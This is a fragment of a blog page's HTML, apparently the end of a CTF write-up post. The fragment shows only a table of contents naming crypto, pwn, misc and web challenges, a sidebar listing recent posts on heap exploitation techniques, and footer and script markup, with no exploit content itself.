href="#3-RSA-1"><span class="toc-number">2.3.</span> <span class="toc-text">3.RSA_1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-RSA-2"><span class="toc-number">2.4.</span> <span class="toc-text">4.RSA_2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-math-1"><span class="toc-number">2.5.</span> <span class="toc-text">5.math_1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6-RSA-3"><span class="toc-number">2.6.</span> <span class="toc-text">6.RSA_3</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#7-math-2"><span class="toc-number">2.7.</span> <span class="toc-text">7.math_2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#8-baby-pad"><span class="toc-number">2.8.</span> <span class="toc-text">8.baby_pad</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PWN"><span class="toc-number">3.</span> <span class="toc-text">PWN</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-nc"><span class="toc-number">3.1.</span> <span class="toc-text">1.nc</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-ret2text"><span class="toc-number">3.2.</span> <span class="toc-text">2.ret2text</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#raw"><span class="toc-number">4.</span> <span class="toc-text">raw</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#3-ret2libc"><span class="toc-number">4.1.</span> <span class="toc-text">3.ret2libc</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-baby-canary"><span class="toc-number">4.2.</span> <span class="toc-text">5.baby_canary</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MISC"><span class="toc-number">5.</span> <span class="toc-text">MISC</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-easy-encode"><span class="toc-number">5.1.</span> <span class="toc-text">1.easy_encode</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-excalibur"><span class="toc-number">5.2.</span> <span class="toc-text">2.excalibur</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E7%AD%BE%E5%88%B0%E9%A2%98"><span class="toc-number">5.3.</span> <span class="toc-text">3.签到题</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E9%97%AE%E5%8D%B7"><span class="toc-number">5.4.</span> <span class="toc-text">4.问卷</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WEB"><span class="toc-number">6.</span> <span class="toc-text">WEB</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E7%9C%9F%E7%9A%84%E6%98%AF%E7%AD%BE%E5%88%B0%E9%A2%98"><span class="toc-number">6.1.</span> <span class="toc-text">1.真的是签到题</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E6%83%85%E6%84%9F%E6%97%A5%E8%AE%B0"><span class="toc-number">6.2.</span> <span class="toc-text">2.情感日记</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E6%96%B0%E7%94%9F%E7%B3%BB%E5%88%971-easyhtml"><span class="toc-number">6.3.</span> <span class="toc-text">3.(新生系列1)easyhtml</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E6%88%91%E7%88%AC%E6%88%91%E7%88%AC"><span class="toc-number">6.4.</span> <span class="toc-text">4.我爬我爬</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-easyheehee"><span class="toc-number">6.5.</span> <span class="toc-text">5.easyheehee</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6-easyweb"><span class="toc-number">6.6.</span> <span class="toc-text">6.easyweb</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#7-%E7%9C%8B%E6%88%91%E5%90%8E%E9%9D%A2"><span class="toc-number">6.7.</span> <span class="toc-text">7.看我后面</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#8-normalPHP"><span class="toc-number">6.8.</span> <span class="toc-text">8.normalPHP</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#9-%E6%B8%A3%E7%94%B7%E8%AE%B0%E5%BD%95"><span class="toc-number">6.9.</span> <span class="toc-text">9.渣男记录</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#10-%E6%9C%89%E6%89%8B%E5%B0%B1%E8%A1%8C"><span class="toc-number">6.10.</span> <span class="toc-text">10.有手就行</span></a></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/2021/03/28/Largebin%20attack%E5%AD%A6%E4%B9%A0/" title="Largebin attack学习"><img src="https://i.loli.net/2021/03/21/mLYCNvXPnutGfBI.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Largebin attack学习"/></a><div class="content"><a class="title" href="/2021/03/28/Largebin%20attack%E5%AD%A6%E4%B9%A0/" title="Largebin attack学习">Largebin attack学习</a><time datetime="2021-03-28T06:10:00.000Z" title="发表于 2021-03-28 14:10:00">2021-03-28</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2021/03/22/BUUOJ%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%E8%A1%A5%E6%A1%A31/" title="BUUOJ刷题记录补档-1"><img src="https://i.loli.net/2021/03/21/2lRt7MpyxaGS8u4.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="BUUOJ刷题记录补档-1"/></a><div class="content"><a class="title" href="/2021/03/22/BUUOJ%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%E8%A1%A5%E6%A1%A31/" title="BUUOJ刷题记录补档-1">BUUOJ刷题记录补档-1</a><time datetime="2021-03-22T13:19:00.000Z" title="发表于 2021-03-22 21:19:00">2021-03-22</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2021/03/20/House%20of%20Spirit%E5%AD%A6%E4%B9%A0/" title="House of Spirit学习"><img src="https://i.loli.net/2021/03/21/pB2PXv3LnAsYNMO.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="House of Spirit学习"/></a><div class="content"><a class="title" href="/2021/03/20/House%20of%20Spirit%E5%AD%A6%E4%B9%A0/" title="House of Spirit学习">House of Spirit学习</a><time datetime="2021-03-20T06:49:00.000Z" title="发表于 2021-03-20 14:49:00">2021-03-20</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2021/03/14/%5BV&amp;N2020%20%E5%85%AC%E5%BC%80%E8%B5%9B%5DsimpleHeap/" title="V&amp;N2020 公开赛 simpleHeap"><img src="https://i.loli.net/2021/03/21/1WR5tiS8lsc9wXb.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="V&amp;N2020 公开赛 simpleHeap"/></a><div class="content"><a class="title" href="/2021/03/14/%5BV&amp;N2020%20%E5%85%AC%E5%BC%80%E8%B5%9B%5DsimpleHeap/" title="V&amp;N2020 公开赛 simpleHeap">V&amp;N2020 公开赛 simpleHeap</a><time datetime="2021-03-14T01:27:00.000Z" title="发表于 2021-03-14 09:27:00">2021-03-14</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2021/02/07/ciscn_2019_es_2/" title="ciscn_2019_es_2"><img src="https://i.loli.net/2021/03/21/y2xBT68QnRUC3O9.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="ciscn_2019_es_2"/></a><div class="content"><a class="title" href="/2021/02/07/ciscn_2019_es_2/" title="ciscn_2019_es_2">ciscn_2019_es_2</a><time datetime="2021-02-07T06:59:00.000Z" title="发表于 2021-02-07 14:59:00">2021-02-07</time></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2021 By 1c3y</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><div class="js-pjax"></div><script defer="defer" id="fluttering_ribbon" mobile="true" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/canvas-fluttering-ribbon.min.js"></script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>